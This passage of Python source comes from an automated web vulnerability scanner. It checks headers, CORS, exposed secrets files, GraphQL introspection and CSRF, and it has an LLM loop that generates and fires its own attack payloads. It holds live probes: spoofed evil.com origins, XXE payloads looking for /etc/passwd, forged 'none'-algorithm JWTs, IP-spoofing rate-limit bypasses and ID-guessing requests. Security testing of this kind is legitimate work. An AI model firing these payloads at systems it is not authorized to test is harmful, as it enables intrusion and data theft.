timeout=self._get_request_timeout()) as resp: headers = dict(resp.headers) headers_lower = {k.lower(): v for k, v in headers.items()} findings = [] # Check X-Frame-Options (Clickjacking) x_frame = headers_lower.get("x-frame-options", "") csp = headers_lower.get("content-security-policy", "") if not x_frame and "frame-ancestors" not in csp.lower(): findings.append({ "type": "clickjacking", "title": "Missing Clickjacking Protection", "severity": "medium", "description": "The page lacks X-Frame-Options header and CSP frame-ancestors directive, making it vulnerable to clickjacking attacks.", "evidence": f"X-Frame-Options: Not set\nCSP: {csp[:100] if csp else 'Not set'}", "remediation": "Add 'X-Frame-Options: DENY' or 'X-Frame-Options: SAMEORIGIN' header, or use 'frame-ancestors' in CSP." }) # Check HSTS hsts = headers_lower.get("strict-transport-security", "") if not hsts and url.startswith("https"): findings.append({ "type": "missing_hsts", "title": "Missing HSTS Header", "severity": "low", "description": "HTTPS site without Strict-Transport-Security header, vulnerable to protocol downgrade attacks.", "evidence": "Strict-Transport-Security: Not set", "remediation": "Add 'Strict-Transport-Security: max-age=31536000; includeSubDomains' header." }) # Check X-Content-Type-Options if "x-content-type-options" not in headers_lower: findings.append({ "type": "missing_xcto", "title": "Missing X-Content-Type-Options Header", "severity": "low", "description": "Missing nosniff header allows MIME-sniffing attacks.", "evidence": "X-Content-Type-Options: Not set", "remediation": "Add 'X-Content-Type-Options: nosniff' header." }) # Check CSP if not csp: findings.append({ "type": "missing_csp", "title": "Missing Content-Security-Policy Header", "severity": "low", "description": "No Content-Security-Policy header, increasing XSS risk.", "evidence": "Content-Security-Policy: Not set", "remediation": "Implement a restrictive Content-Security-Policy." }) # Create findings (non-AI: detected by header inspection) # Domain-scoped dedup: only 1 finding per domain for header issues for f in findings: mapped = self._map_vuln_type(f["type"]) vt = f["type"] # Check if we already have this finding for this domain if self.memory.has_finding_for(vt, url): # Append URL to existing finding's affected_urls for ef in self.memory.confirmed_findings: if ef.vulnerability_type == vt: if url not in ef.affected_urls: ef.affected_urls.append(url) break continue finding = Finding( id=hashlib.md5(f"{vt}{url}".encode()).hexdigest()[:8], title=self.vuln_registry.get_title(mapped) or f["title"], severity=self.vuln_registry.get_severity(mapped) or f["severity"], vulnerability_type=vt, cvss_score=self._get_cvss_score(vt), cvss_vector=self._get_cvss_vector(vt), cwe_id=self.vuln_registry.get_cwe_id(mapped) or "CWE-693", description=self.vuln_registry.get_description(mapped) or f["description"], affected_endpoint=url, evidence=f["evidence"], remediation=self.vuln_registry.get_remediation(mapped) or f["remediation"], affected_urls=[url], ai_verified=False # Detected by inspection, not AI ) await self._add_finding(finding) except Exception as e: await self.log("debug", f" Header test error: {e}") async def _test_cors(self): """Test for CORS misconfigurations""" await self.log("info", f" Testing CORS configuration...") test_origins = [ "https://evil.com", "https://attacker.com", "null" ] for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not url: continue for origin in test_origins: try: headers = {"Origin": origin} async with self.session.get(url, headers=headers) as resp: acao = resp.headers.get("Access-Control-Allow-Origin", "") acac = resp.headers.get("Access-Control-Allow-Credentials", "") if acao == origin or acao == "*": # Domain-scoped dedup for CORS if self.memory.has_finding_for("cors_misconfig", url): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == "cors_misconfig": if url not in ef.affected_urls: ef.affected_urls.append(url) break break severity = "high" if acac.lower() == "true" else "medium" finding = Finding( id=hashlib.md5(f"cors{url}{origin}".encode()).hexdigest()[:8], title=self.vuln_registry.get_title("cors_misconfig") or f"CORS Misconfiguration - {origin}", severity=severity, vulnerability_type="cors_misconfig", cvss_score=self._get_cvss_score("cors_misconfig"), cvss_vector=self._get_cvss_vector("cors_misconfig"), cwe_id=self.vuln_registry.get_cwe_id("cors_misconfig") or "CWE-942", description=self.vuln_registry.get_description("cors_misconfig") or f"The server reflects the Origin header '{origin}' in Access-Control-Allow-Origin.", affected_endpoint=url, evidence=f"Origin: {origin}\nAccess-Control-Allow-Origin: {acao}\nAccess-Control-Allow-Credentials: {acac}", remediation=self.vuln_registry.get_remediation("cors_misconfig") or "Configure CORS to only allow trusted origins.", affected_urls=[url], ai_verified=False # Detected by inspection, not AI ) await self._add_finding(finding) await self.log("warning", f" [FOUND] CORS misconfiguration at {url[:50]}") break except: pass async def _test_information_disclosure(self): """Test for information disclosure""" await self.log("info", f" Testing for information disclosure...") for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]: if not url: continue try: async with self.session.get(url) as resp: headers = dict(resp.headers) # Server header disclosure (domain-scoped: sensitive_data_exposure) server = headers.get("Server", "") if server and any(v in server.lower() for v in ["apache/", "nginx/", "iis/", "tomcat/"]): vt = "sensitive_data_exposure" dedup_key = f"server_version" if self.memory.has_finding_for(vt, url, dedup_key): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == vt and ef.parameter == dedup_key: if url not in ef.affected_urls: ef.affected_urls.append(url) break else: finding = Finding( id=hashlib.md5(f"server{url}".encode()).hexdigest()[:8], title="Server Version Disclosure", severity="info", vulnerability_type=vt, cvss_score=0.0, cwe_id="CWE-200", description=f"The server discloses its version: {server}", affected_endpoint=url, parameter=dedup_key, evidence=f"Server: {server}", remediation="Remove or obfuscate the Server header to prevent version disclosure.", affected_urls=[url], ai_verified=False # Detected by inspection ) await self._add_finding(finding) # X-Powered-By disclosure (domain-scoped: sensitive_data_exposure) powered_by = headers.get("X-Powered-By", "") if powered_by: vt = "sensitive_data_exposure" dedup_key = f"x_powered_by" if self.memory.has_finding_for(vt, url, dedup_key): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == vt and ef.parameter == dedup_key: if url not in ef.affected_urls: ef.affected_urls.append(url) break else: finding = Finding( id=hashlib.md5(f"poweredby{url}".encode()).hexdigest()[:8], title="Technology Version Disclosure", severity="info", vulnerability_type=vt, cvss_score=0.0, cwe_id="CWE-200", description=f"The X-Powered-By header reveals technology: {powered_by}", affected_endpoint=url, parameter=dedup_key, evidence=f"X-Powered-By: {powered_by}", remediation="Remove the X-Powered-By header.", affected_urls=[url], ai_verified=False # Detected by inspection ) await self._add_finding(finding) except: pass async def _test_misconfigurations(self): """Test for directory listing, debug mode, admin panels, API docs""" await self.log("info", " Testing for misconfigurations...") # Common paths to check check_paths = { "directory_listing": ["/", "/assets/", "/images/", "/uploads/", "/static/", "/backup/"], "debug_mode": ["/debug", "/debug/", "/_debug", "/trace", "/elmah.axd", "/phpinfo.php"], "exposed_admin_panel": ["/admin", "/admin/", "/administrator", "/wp-admin", "/manager", "/dashboard", "/cpanel"], "exposed_api_docs": ["/swagger", "/swagger-ui", "/api-docs", "/docs", "/redoc", "/graphql", "/openapi.json"], } parsed_target = urlparse(self.target) base = f"{parsed_target.scheme}://{parsed_target.netloc}" for vuln_type, paths in check_paths.items(): await self._wait_if_paused() if self.is_cancelled(): return for path in paths: if self.is_cancelled(): return url = base + path try: async with self.session.get(url, allow_redirects=False, timeout=self._get_request_timeout()) as resp: status = resp.status body = await resp.text() headers = dict(resp.headers) detected = False evidence = "" if vuln_type == "directory_listing" and status == 200: if "Index of" in body or "Directory listing" in body or "
" in body:
detected = True
evidence = f"Directory listing enabled at {path}"
elif vuln_type == "debug_mode" and status == 200:
debug_markers = ["stack trace", "traceback", "debug toolbar",
"phpinfo()", "DJANGO_SETTINGS_MODULE", "laravel_debugbar"]
if any(m.lower() in body.lower() for m in debug_markers):
detected = True
evidence = f"Debug mode/info exposed at {path}"
elif vuln_type == "exposed_admin_panel" and status == 200:
admin_markers = ["login", "admin", "password", "sign in", "username"]
if sum(1 for m in admin_markers if m.lower() in body.lower()) >= 2:
detected = True
evidence = f"Admin panel found at {path}"
elif vuln_type == "exposed_api_docs" and status == 200:
doc_markers = ["swagger", "openapi", "api documentation", "graphql",
"query {", "mutation {", "paths", "components"]
if any(m.lower() in body.lower() for m in doc_markers):
detected = True
evidence = f"API documentation exposed at {path}"
if detected:
if not self.memory.has_finding_for(vuln_type, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vuln_type, {})
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}".encode()).hexdigest()[:8],
title=info.get("title", vuln_type.replace("_", " ").title()),
severity=info.get("severity", "low"),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=info.get("cwe_id", "CWE-16"),
description=info.get("description", evidence),
affected_endpoint=url,
evidence=evidence,
remediation=info.get("remediation", "Restrict access to this resource."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] {vuln_type} at {path}")
break # One finding per vuln type is enough
except:
pass
async def _test_data_exposure(self):
"""Test for source code disclosure, backup files, API key exposure"""
await self.log("info", " Testing for data exposure...")
parsed_target = urlparse(self.target)
base = f"{parsed_target.scheme}://{parsed_target.netloc}"
exposure_checks = {
"source_code_disclosure": {
"paths": ["/.git/HEAD", "/.svn/entries", "/.env", "/wp-config.php.bak",
"/.htaccess", "/web.config", "/config.php~"],
"markers": ["ref:", "svn", "DB_PASSWORD", "APP_KEY", "SECRET_KEY"],
},
"backup_file_exposure": {
"paths": ["/backup.zip", "/backup.sql", "/db.sql", "/site.tar.gz",
"/backup.tar", "/.sql", "/dump.sql"],
"markers": ["PK\x03\x04", "CREATE TABLE", "INSERT INTO", "mysqldump"],
},
"api_key_exposure": {
"paths": ["/config.js", "/env.js", "/settings.json", "/.env.local",
"/api/config", "/static/js/app.*.js"],
"markers": ["api_key", "apikey", "api-key", "secret_key", "access_token",
"AKIA", "sk-", "pk_live_", "ghp_", "glpat-"],
},
}
for vuln_type, config in exposure_checks.items():
await self._wait_if_paused()
if self.is_cancelled():
return
for path in config["paths"]:
if self.is_cancelled():
return
url = base + path
try:
async with self.session.get(url, allow_redirects=False, timeout=self._get_request_timeout()) as resp:
if resp.status == 200:
body = await resp.text()
body_bytes = body[:1000]
if any(m in body_bytes for m in config["markers"]):
if not self.memory.has_finding_for(vuln_type, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vuln_type, {})
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}".encode()).hexdigest()[:8],
title=info.get("title", vuln_type.replace("_", " ").title()),
severity=info.get("severity", "high"),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=info.get("cwe_id", "CWE-200"),
description=f"Sensitive file exposed at {path}",
affected_endpoint=url,
evidence=f"HTTP 200 at {path} with sensitive content markers",
remediation=info.get("remediation", "Remove or restrict access to this file."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] {vuln_type} at {path}")
break
except:
pass
async def _test_ssl_crypto(self):
"""Test for SSL/TLS issues and crypto weaknesses"""
await self.log("info", " Testing SSL/TLS configuration...")
parsed = urlparse(self.target)
# Check if site is HTTP-only (no HTTPS redirect)
if parsed.scheme == "http":
vt = "cleartext_transmission"
if not self.memory.has_finding_for(vt, self.target, ""):
https_url = self.target.replace("http://", "https://")
has_https = False
try:
async with self.session.get(https_url, timeout=5) as resp:
has_https = resp.status < 400
except:
pass
if not has_https:
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{self.target}".encode()).hexdigest()[:8],
title="Cleartext HTTP Transmission",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-319",
description="Application is served over HTTP without HTTPS.",
affected_endpoint=self.target,
evidence="No HTTPS endpoint available",
remediation=info.get("remediation", "Enable HTTPS with a valid TLS certificate."),
affected_urls=[self.target],
ai_verified=False
)
await self._add_finding(finding)
# Check HSTS header
try:
async with self.session.get(self.target) as resp:
headers = dict(resp.headers)
if "Strict-Transport-Security" not in headers and parsed.scheme == "https":
vt = "ssl_issues"
if not self.memory.has_finding_for(vt, self.target, "hsts"):
finding = Finding(
id=hashlib.md5(f"hsts{self.target}".encode()).hexdigest()[:8],
title="Missing HSTS Header",
severity="low",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cwe_id="CWE-523",
description="Strict-Transport-Security header not set.",
affected_endpoint=self.target,
parameter="hsts",
evidence="HSTS header missing from HTTPS response",
remediation="Add Strict-Transport-Security header with appropriate max-age.",
affected_urls=[self.target],
ai_verified=False
)
await self._add_finding(finding)
except:
pass
async def _test_graphql_introspection(self):
"""Test for GraphQL introspection exposure"""
await self.log("info", " Testing for GraphQL introspection...")
parsed = urlparse(self.target)
base = f"{parsed.scheme}://{parsed.netloc}"
graphql_paths = ["/graphql", "/api/graphql", "/v1/graphql", "/query"]
introspection_query = '{"query":"{__schema{types{name}}}"}'
for path in graphql_paths:
url = base + path
try:
async with self.session.post(
url,
data=introspection_query,
headers={"Content-Type": "application/json"},
) as resp:
if resp.status == 200:
body = await resp.text()
if "__schema" in body or "queryType" in body:
vt = "graphql_introspection"
if not self.memory.has_finding_for(vt, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{url}".encode()).hexdigest()[:8],
title="GraphQL Introspection Enabled",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-200",
description=info.get("description", "GraphQL introspection is enabled, exposing the full API schema."),
affected_endpoint=url,
evidence="__schema data returned from introspection query",
remediation=info.get("remediation", "Disable introspection in production."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] GraphQL introspection at {path}")
return
except:
pass
async def _test_csrf_inspection(self):
"""Test for CSRF protection on forms"""
await self.log("info", " Testing for CSRF protection...")
for form in self.recon.forms[:10]:
if form.get("method", "GET").upper() != "POST":
continue
action = form.get("action", "")
inputs = form.get("inputs", [])
# Check if form has CSRF token
csrf_names = {"csrf", "_token", "csrfmiddlewaretoken", "authenticity_token",
"__RequestVerificationToken", "_csrf", "csrf_token"}
has_token = any(
inp.lower() in csrf_names
for inp in inputs
if isinstance(inp, str)
)
if not has_token and action:
vt = "csrf"
if not self.memory.has_finding_for(vt, action, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{action}".encode()).hexdigest()[:8],
title="Missing CSRF Protection",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-352",
description=f"POST form at {action} lacks CSRF token protection.",
affected_endpoint=action,
evidence=f"No CSRF token found in form fields: {inputs[:5]}",
remediation=info.get("remediation", "Implement CSRF tokens for all state-changing requests."),
affected_urls=[action],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] Missing CSRF protection at {action[:50]}")
async def _ai_dynamic_test(self, user_prompt: str):
"""
AI-driven dynamic vulnerability testing - can test ANY vulnerability type.
The LLM generates payloads, test strategies, and analyzes results dynamically.
Examples of what this can test:
- XXE (XML External Entity)
- Race Conditions
- Rate Limiting Bypass
- WAF Bypass
- CSP Bypass
- BFLA (Broken Function Level Authorization)
- BOLA (Broken Object Level Authorization)
- JWT vulnerabilities
- GraphQL injection
- NoSQL injection
- Prototype pollution
- And ANY other vulnerability type!
"""
await self.log("info", f"[AI DYNAMIC TEST] Processing: {user_prompt}")
if not self.llm.is_available():
await self.log("warning", " LLM not available - attempting basic tests based on prompt")
await self._ai_test_fallback(user_prompt)
return
# Gather reconnaissance context
endpoints_info = []
for ep in self.recon.endpoints[:15]:
url = _get_endpoint_url(ep)
method = _get_endpoint_method(ep)
if url:
endpoints_info.append({"url": url, "method": method})
forms_info = []
for form in self.recon.forms[:5]:
if isinstance(form, dict):
forms_info.append({
"action": form.get("action", ""),
"method": form.get("method", "GET"),
"inputs": form.get("inputs", [])[:5]
})
context = f"""
TARGET: {self.target}
TECHNOLOGIES: {', '.join(self.recon.technologies) if self.recon.technologies else 'Unknown'}
ENDPOINTS ({len(endpoints_info)} found):
{json.dumps(endpoints_info[:10], indent=2)}
FORMS ({len(forms_info)} found):
{json.dumps(forms_info, indent=2)}
PARAMETERS DISCOVERED: {list(self.recon.parameters.keys())[:20]}
"""
# Phase 1: Ask AI to understand the vulnerability and create test strategy
strategy_prompt = f"""You are an expert penetration tester. The user wants to test for:
"{user_prompt}"
Based on the target information below, create a comprehensive testing strategy.
{context}
Respond in JSON format with:
{{
"vulnerability_type": "name of the vulnerability being tested",
"cwe_id": "CWE-XXX if applicable",
"owasp_category": "OWASP category if applicable",
"description": "Brief description of what this vulnerability is",
"severity_if_found": "critical|high|medium|low",
"cvss_estimate": 0.0-10.0,
"test_cases": [
{{
"name": "Test case name",
"technique": "Technique being used",
"url": "URL to test (use actual URLs from context)",
"method": "GET|POST|PUT|DELETE",
"headers": {{"Header-Name": "value"}},
"body": "request body if POST/PUT",
"content_type": "application/json|application/xml|application/x-www-form-urlencoded",
"success_indicators": ["what to look for in response that indicates vulnerability"],
"failure_indicators": ["what indicates NOT vulnerable"]
}}
],
"payloads": ["list of specific payloads to try"],
"analysis_tips": "What patterns or behaviors indicate this vulnerability"
}}
Generate at least 3-5 realistic test cases using the actual endpoints from the context.
Be creative and thorough - think like a real penetration tester."""
await self.log("info", " Phase 1: AI generating test strategy...")
try:
strategy_response = await self.llm.generate(
strategy_prompt,
get_system_prompt("strategy")
)
# Extract JSON from response
match = re.search(r'\{[\s\S]*\}', strategy_response)
if not match:
await self.log("warning", " AI did not return valid JSON strategy, using fallback")
await self._ai_test_fallback(user_prompt)
return
strategy = json.loads(match.group())
vuln_type = strategy.get("vulnerability_type", user_prompt)
cwe_id = strategy.get("cwe_id", "")
severity = strategy.get("severity_if_found", "medium")
cvss = strategy.get("cvss_estimate", 5.0)
description = strategy.get("description", f"Testing for {vuln_type}")
await self.log("info", f" Vulnerability: {vuln_type}")
await self.log("info", f" CWE: {cwe_id} | Severity: {severity} | CVSS: {cvss}")
await self.log("info", f" Test cases: {len(strategy.get('test_cases', []))}")
# Phase 2: Execute test cases
await self.log("info", " Phase 2: Executing AI-generated test cases...")
test_results = []
for i, test_case in enumerate(strategy.get("test_cases", [])[:10]):
test_name = test_case.get("name", f"Test {i+1}")
await self.log("debug", f" Running: {test_name}")
result = await self._execute_ai_dynamic_test(test_case)
if result:
result["test_name"] = test_name
result["success_indicators"] = test_case.get("success_indicators", [])
result["failure_indicators"] = test_case.get("failure_indicators", [])
test_results.append(result)
# Phase 3: AI analysis of results
await self.log("info", " Phase 3: AI analyzing results...")
analysis_prompt = f"""Analyze these test results for {vuln_type} vulnerability.
VULNERABILITY BEING TESTED: {vuln_type}
{description}
ANALYSIS TIPS: {strategy.get('analysis_tips', 'Look for error messages, unexpected behavior, or data leakage')}
TEST RESULTS:
{json.dumps(test_results[:5], indent=2, default=str)[:8000]}
For each test result, analyze if it indicates a vulnerability.
Consider:
- Success indicators: {strategy.get('test_cases', [{}])[0].get('success_indicators', [])}
- Response status codes, error messages, timing differences, data in response
Respond in JSON:
{{
"findings": [
{{
"is_vulnerable": true|false,
"confidence": "high|medium|low",
"test_name": "which test",
"evidence": "specific evidence from response",
"explanation": "why this indicates vulnerability"
}}
],
"overall_assessment": "summary of findings",
"recommendations": ["list of remediation steps"]
}}"""
analysis_response = await self.llm.generate(
analysis_prompt,
get_system_prompt("confirmation")
)
# Parse analysis
analysis_match = re.search(r'\{[\s\S]*\}', analysis_response)
if analysis_match:
analysis = json.loads(analysis_match.group())
for finding_data in analysis.get("findings", []):
if finding_data.get("is_vulnerable") and finding_data.get("confidence") in ["high", "medium"]:
evidence = finding_data.get("evidence", "")
test_name = finding_data.get("test_name", "AI Test")
# Find the matching test result for endpoint + body
affected_endpoint = self.target
matched_body = ""
for tr in test_results:
if tr.get("test_name") == test_name:
affected_endpoint = tr.get("url", self.target)
matched_body = tr.get("body", "")
break
# Anti-hallucination: verify AI evidence in actual response
if evidence and matched_body:
if not self._evidence_in_response(evidence, matched_body):
await self.log("debug", f" [REJECTED] AI claimed evidence not found in response for {test_name}")
self.memory.reject_finding(
type("F", (), {"vulnerability_type": vuln_type, "affected_endpoint": affected_endpoint, "parameter": ""})(),
f"AI evidence not grounded in HTTP response: {evidence[:100]}"
)
continue
# Get metadata from registry if available
mapped = self._map_vuln_type(vuln_type.lower().replace(" ", "_"))
reg_title = self.vuln_registry.get_title(mapped)
reg_cwe = self.vuln_registry.get_cwe_id(mapped)
reg_remediation = self.vuln_registry.get_remediation(mapped)
finding = Finding(
id=hashlib.md5(f"{vuln_type}{affected_endpoint}{test_name}".encode()).hexdigest()[:8],
title=reg_title or f"{vuln_type}",
severity=severity,
vulnerability_type=vuln_type.lower().replace(" ", "_"),
cvss_score=float(cvss) if cvss else 5.0,
cvss_vector=self._get_cvss_vector(vuln_type.lower().replace(" ", "_")),
cwe_id=reg_cwe or cwe_id or "",
description=f"{description}\n\nAI Explanation: {finding_data.get('explanation', '')}",
affected_endpoint=affected_endpoint,
evidence=evidence[:1000],
remediation=reg_remediation or "\n".join(analysis.get("recommendations", [])),
ai_verified=True
)
await self._add_finding(finding)
await self.log("warning", f" [AI FOUND] {vuln_type} - {finding_data.get('confidence')} confidence")
await self.log("info", f" Assessment: {analysis.get('overall_assessment', 'Analysis complete')[:100]}")
except json.JSONDecodeError as e:
await self.log("warning", f" JSON parse error: {e}")
await self._ai_test_fallback(user_prompt)
except Exception as e:
await self.log("error", f" AI dynamic test error: {e}")
await self._ai_test_fallback(user_prompt)
async def _execute_ai_dynamic_test(self, test_case: Dict) -> Optional[Dict]:
"""Execute a single AI-generated test case"""
if not self.session:
return None
try:
url = test_case.get("url", self.target)
method = test_case.get("method", "GET").upper()
headers = test_case.get("headers", {})
body = test_case.get("body", "")
content_type = test_case.get("content_type", "")
if content_type and "Content-Type" not in headers:
headers["Content-Type"] = content_type
start_time = asyncio.get_event_loop().time()
if method == "GET":
async with self.session.get(url, headers=headers, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
elif method == "POST":
if content_type == "application/json" and isinstance(body, str):
try:
body = json.loads(body)
except:
pass
async with self.session.post(url, headers=headers, data=body if isinstance(body, str) else None, json=body if isinstance(body, dict) else None, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
elif method in ["PUT", "DELETE", "PATCH"]:
request_method = getattr(self.session, method.lower())
async with request_method(url, headers=headers, data=body, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
except Exception as e:
return {
"url": url,
"method": method,
"error": str(e),
"status": 0
}
return None
async def _ai_test_fallback(self, user_prompt: str):
"""Fallback testing when LLM is not available - uses keyword detection"""
await self.log("info", f" Running fallback tests for: {user_prompt}")
prompt_lower = user_prompt.lower()
# Define fallback test mappings
fallback_tests = {
"xxe": self._test_xxe_fallback,
"xml": self._test_xxe_fallback,
"race": self._test_race_condition_fallback,
"rate": self._test_rate_limit_fallback,
"bola": self._test_idor_fallback,
"idor": self._test_idor_fallback,
"bfla": self._test_bfla_fallback,
"jwt": self._test_jwt_fallback,
"graphql": self._test_graphql_fallback,
"nosql": self._test_nosql_fallback,
"waf": self._test_waf_bypass_fallback,
"csp": self._test_csp_bypass_fallback,
}
tests_run = False
for keyword, test_func in fallback_tests.items():
if keyword in prompt_lower:
await test_func()
tests_run = True
if not tests_run:
await self.log("warning", " No fallback test matched. LLM required for this test type.")
async def _test_xxe_fallback(self):
"""Test for XXE without LLM"""
await self.log("info", " Testing XXE (XML External Entity)...")
xxe_payloads = [
']>&xxe; ',
']>&xxe; ',
'%xxe;]> ',
]
for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]:
if not endpoint:
continue
for payload in xxe_payloads:
try:
headers = {"Content-Type": "application/xml"}
async with self.session.post(endpoint, data=payload, headers=headers) as resp:
body = await resp.text()
if "root:" in body or "daemon:" in body or "ENTITY" in body.lower():
finding = Finding(
id=hashlib.md5(f"xxe{endpoint}".encode()).hexdigest()[:8],
title="XXE (XML External Entity) Injection",
severity="critical",
vulnerability_type="xxe",
cvss_score=9.1,
cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
cwe_id="CWE-611",
description="XML External Entity injection allows reading local files and potentially SSRF.",
affected_endpoint=endpoint,
payload=payload[:200],
evidence=body[:500],
remediation="Disable external entity processing in XML parsers. Use JSON instead of XML where possible.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] XXE at {endpoint[:50]}")
return
except:
pass
async def _test_race_condition_fallback(self):
"""Test for race conditions without LLM"""
await self.log("info", " Testing Race Conditions...")
# Find form endpoints that might be vulnerable
target_endpoints = []
for form in self.recon.forms[:3]:
if isinstance(form, dict):
action = form.get("action", "")
if action:
target_endpoints.append(action)
if not target_endpoints:
target_endpoints = [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3] if _get_endpoint_url(ep)]
for endpoint in target_endpoints:
try:
# Send multiple concurrent requests
tasks = []
for _ in range(10):
tasks.append(self.session.get(endpoint))
responses = await asyncio.gather(*[task.__aenter__() for task in tasks], return_exceptions=True)
# Check for inconsistent responses (potential race condition indicator)
statuses = [r.status for r in responses if hasattr(r, 'status')]
if len(set(statuses)) > 1:
await self.log("info", f" Inconsistent responses detected at {endpoint[:50]} - potential race condition")
except:
pass
async def _test_rate_limit_fallback(self):
"""Test for rate limiting bypass without LLM"""
await self.log("info", " Testing Rate Limiting...")
headers_to_try = [
{"X-Forwarded-For": "127.0.0.1"},
{"X-Real-IP": "127.0.0.1"},
{"X-Originating-IP": "127.0.0.1"},
{"X-Client-IP": "127.0.0.1"},
{"True-Client-IP": "127.0.0.1"},
]
for endpoint in [self.target]:
for headers in headers_to_try:
try:
# Send many requests
for i in range(20):
headers["X-Forwarded-For"] = f"192.168.1.{i}"
async with self.session.get(endpoint, headers=headers) as resp:
if resp.status == 429:
await self.log("info", f" Rate limit hit at request {i}")
break
if i == 19:
await self.log("warning", f" [POTENTIAL] No rate limiting detected with header bypass")
except:
pass
async def _test_idor_fallback(self):
"""Test for IDOR/BOLA without LLM"""
await self.log("info", " Testing IDOR/BOLA...")
# Find endpoints with numeric parameters
for param, endpoints in self.recon.parameters.items():
for endpoint in endpoints[:2]:
url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint
if not url:
continue
# Try changing IDs
for test_id in ["1", "2", "0", "-1", "9999999"]:
try:
parsed = urlparse(url)
test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{param}={test_id}"
async with self.session.get(test_url) as resp:
if resp.status == 200:
body = await resp.text()
if len(body) > 100:
await self.log("debug", f" Got response for {param}={test_id}")
except:
pass
async def _test_bfla_fallback(self):
"""Test for BFLA without LLM"""
await self.log("info", " Testing BFLA (Broken Function Level Authorization)...")
admin_paths = ["/admin", "/api/admin", "/api/v1/admin", "/manage", "/dashboard", "/internal"]
for path in admin_paths:
try:
url = urljoin(self.target, path)
async with self.session.get(url) as resp:
if resp.status == 200:
await self.log("warning", f" [POTENTIAL] Admin endpoint accessible: {url}")
elif resp.status in [401, 403]:
await self.log("debug", f" Protected: {url}")
except:
pass
async def _test_jwt_fallback(self):
"""Test for JWT vulnerabilities without LLM"""
await self.log("info", " Testing JWT vulnerabilities...")
# Try none algorithm and other JWT attacks
jwt_tests = [
"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.",
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.test",
]
for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]:
if not endpoint:
continue
for jwt in jwt_tests:
try:
headers = {"Authorization": f"Bearer {jwt}"}
async with self.session.get(endpoint, headers=headers) as resp:
if resp.status == 200:
await self.log("debug", f" JWT accepted at {endpoint[:50]}")
except:
pass
async def _test_graphql_fallback(self):
"""Test for GraphQL vulnerabilities without LLM"""
await self.log("info", " Testing GraphQL...")
graphql_endpoints = ["/graphql", "/api/graphql", "/v1/graphql", "/query"]
introspection_query = '{"query": "{ __schema { types { name } } }"}'
for path in graphql_endpoints:
try:
url = urljoin(self.target, path)
headers = {"Content-Type": "application/json"}
async with self.session.post(url, data=introspection_query, headers=headers) as resp:
if resp.status == 200:
body = await resp.text()
if "__schema" in body or "types" in body:
finding = Finding(
id=hashlib.md5(f"graphql{url}".encode()).hexdigest()[:8],
title="GraphQL Introspection Enabled",
severity="low",
vulnerability_type="graphql_introspection",
cvss_score=3.0,
cwe_id="CWE-200",
description="GraphQL introspection is enabled, exposing the entire API schema.",
affected_endpoint=url,
evidence=body[:500],
remediation="Disable introspection in production environments.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] GraphQL introspection at {url}")
except:
pass
async def _test_nosql_fallback(self):
"""Test for NoSQL injection without LLM"""
